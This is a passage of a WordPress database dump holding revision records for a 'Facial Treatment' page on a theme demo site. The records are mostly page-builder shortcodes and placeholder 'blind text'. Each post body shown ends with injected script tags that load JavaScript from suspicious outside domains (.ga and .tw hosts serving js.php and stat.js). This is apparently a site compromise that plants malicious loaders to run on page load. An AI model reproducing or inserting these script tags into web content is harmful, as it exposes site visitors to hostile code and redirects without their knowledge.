src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','bg-top','','inherit','open','closed','','bg-top','','','2018-01-11 00:54:55','2018-01-11 00:54:55','',6269,'http://sandbox.futuremediatrix.com/medikpro/wp-content/uploads/2018/01/bg-top.jpg',0,'attachment','image/jpeg',0),(6620,1,'2018-01-11 00:55:21','2018-01-11 00:55:21','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_image=\"6619\" bg_position=\"center top\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" bg_color=\"#f9f7f5\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" id=\"services\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-4-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" bottom_margin=\"20\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/310797/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Content\r\n<i>Creation</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Telescope\" min_height=\"400\"]Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. Separated they live on.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/190727/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Market\r\n<i>Growth</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Spring\" min_height=\"400\"]The Big Oxmox advised her not to do so, because there were thousands of bad Commas, wild Question Marks and devious Semikoli.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/467163/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Ending\r\n<i>Competition</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Grave\" min_height=\"400\"]Pityful a rethoric question ran over her cheek, then she continued her way. On her way she met a copy. The copy warned the Little Blind Text.[/nectar_flip_box][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/422400/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Private\r\n<i>Tutoring</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Face-Style2\" min_height=\"400\"]ar from the countries Vokalia and Consonantia, there live the blind texts. Separated they live in Bookmarksgrove right at the coast.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/317099/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Event\r\n<i>Hosting</i></h3>\r\n\" icon_iconsmind=\"iconsmind-The-WhiteHouse\" min_height=\"400\"]Even the all-powerful Pointing has no control about the blind texts it is an almost life One day however a small line of blind text.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/179646/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Browser<i>Addons</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Love-Window\" min_height=\"400\"]But nothing the copy said could convince her and so it didn’t take long until a few insidious Copy Writers ambushed her, made her drunk.[/nectar_flip_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','inherit','closed','closed','','6269-revision-v1','','','2018-01-11 00:55:21','2018-01-11 00:55:21','',6269,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6269-revision-v1/',0,'revision','',0),(6621,1,'2018-01-11 00:56:01','2018-01-11 00:56:01','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_image=\"6619\" bg_position=\"center top\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Facial[/vc_column_text][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" bg_color=\"#f9f7f5\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" id=\"services\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-4-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" bottom_margin=\"20\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/310797/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Content\r\n<i>Creation</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Telescope\" min_height=\"400\"]Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. Separated they live on.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/190727/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Market\r\n<i>Growth</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Spring\" min_height=\"400\"]The Big Oxmox advised her not to do so, because there were thousands of bad Commas, wild Question Marks and devious Semikoli.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/467163/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Ending\r\n<i>Competition</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Grave\" min_height=\"400\"]Pityful a rethoric question ran over her cheek, then she continued her way. On her way she met a copy. The copy warned the Little Blind Text.[/nectar_flip_box][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/422400/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Private\r\n<i>Tutoring</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Face-Style2\" min_height=\"400\"]ar from the countries Vokalia and Consonantia, there live the blind texts. Separated they live in Bookmarksgrove right at the coast.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/317099/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Event\r\n<i>Hosting</i></h3>\r\n\" icon_iconsmind=\"iconsmind-The-WhiteHouse\" min_height=\"400\"]Even the all-powerful Pointing has no control about the blind texts it is an almost life One day however a small line of blind text.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/179646/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Browser<i>Addons</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Love-Window\" min_height=\"400\"]But nothing the copy said could convince her and so it didn’t take long until a few insidious Copy Writers ambushed her, made her drunk.[/nectar_flip_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','inherit','closed','closed','','6269-revision-v1','','','2018-01-11 00:56:01','2018-01-11 00:56:01','',6269,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6269-revision-v1/',0,'revision','',0),(6622,1,'2018-01-11 00:57:32','2018-01-11 00:57:32','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_image=\"6619\" bg_position=\"center top\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_custom_heading text=\"Facial Treatment\" font_container=\"tag:h2|font_size:32|text_align:left|line_height:32\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" bg_color=\"#f9f7f5\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" id=\"services\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-4-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" bottom_margin=\"20\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/310797/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Content\r\n<i>Creation</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Telescope\" min_height=\"400\"]Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. Separated they live on.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/190727/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Market\r\n<i>Growth</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Spring\" min_height=\"400\"]The Big Oxmox advised her not to do so, because there were thousands of bad Commas, wild Question Marks and devious Semikoli.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/467163/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Ending\r\n<i>Competition</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Grave\" min_height=\"400\"]Pityful a rethoric question ran over her cheek, then she continued her way. On her way she met a copy. The copy warned the Little Blind Text.[/nectar_flip_box][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/422400/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Private\r\n<i>Tutoring</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Face-Style2\" min_height=\"400\"]ar from the countries Vokalia and Consonantia, there live the blind texts. Separated they live in Bookmarksgrove right at the coast.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/317099/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Event\r\n<i>Hosting</i></h3>\r\n\" icon_iconsmind=\"iconsmind-The-WhiteHouse\" min_height=\"400\"]Even the all-powerful Pointing has no control about the blind texts it is an almost life One day however a small line of blind text.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/179646/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Browser<i>Addons</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Love-Window\" min_height=\"400\"]But nothing the copy said could convince her and so it didn’t take long until a few insidious Copy Writers ambushed her, made her drunk.[/nectar_flip_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','inherit','closed','closed','','6269-revision-v1','','','2018-01-11 00:57:32','2018-01-11 00:57:32','',6269,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6269-revision-v1/',0,'revision','',0),(6623,1,'2018-01-11 00:58:00','2018-01-11 00:58:00','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"6619\" bg_position=\"center top\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_custom_heading text=\"Facial Treatment\" font_container=\"tag:h2|font_size:32|text_align:left|line_height:32\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"in_container\" full_screen_row_position=\"middle\" bg_color=\"#f9f7f5\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" id=\"services\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"padding-4-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" bottom_margin=\"20\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/310797/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Content\r\n<i>Creation</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Telescope\" min_height=\"400\"]Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. Separated they live on.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/190727/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Market\r\n<i>Growth</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Spring\" min_height=\"400\"]The Big Oxmox advised her not to do so, because there were thousands of bad Commas, wild Question Marks and devious Semikoli.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/467163/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Ending\r\n<i>Competition</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Grave\" min_height=\"400\"]Pityful a rethoric question ran over her cheek, then she continued her way. On her way she met a copy. The copy warned the Little Blind Text.[/nectar_flip_box][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/422400/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Private\r\n<i>Tutoring</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Face-Style2\" min_height=\"400\"]ar from the countries Vokalia and Consonantia, there live the blind texts. Separated they live in Bookmarksgrove right at the coast.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/317099/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" 